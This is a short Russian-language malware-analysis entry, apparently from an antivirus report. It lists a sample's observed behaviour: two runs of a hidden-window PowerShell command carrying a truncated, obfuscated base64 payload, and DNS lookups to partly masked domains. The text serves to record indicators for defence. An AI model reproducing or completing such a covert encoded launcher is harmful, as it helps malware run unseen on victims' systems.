Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAoACcAQwBIAG4AJwArACcAbgBzACcAKwAnAGEAZABhACcAKwAnAHMAZAAgAD0AIAAmACcAKwAnACgAJwArACcAMgByAE0AJwArACcAbgAnACsAJwAyAHIAJwArACcATQAnACsAJwArADIAcgAnACsAJwBNAGUAMgAnACsAJw...
- DNS ASK ki####lawfirm.com
- DNS ASK ga####cing.co.uk
- DNS ASK s-####buki.co.jp
- DNS ASK le###piele.de
- DNS ASK fr####manmedia.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAoACcAQwBIAG4AJwArACcAbgBzACcAKwAnAGEAZABhACcAKwAnAHMAZAAgAD0AIAAmACcAKwAnACgAJwArACcAMgByAE0AJwArACcAbgAnACsAJwAyAHIAJwArACcATQAnACsAJwArADIAcgAnACsAJwBNAGUAMgAnACsAJw...' (со скрытым окном)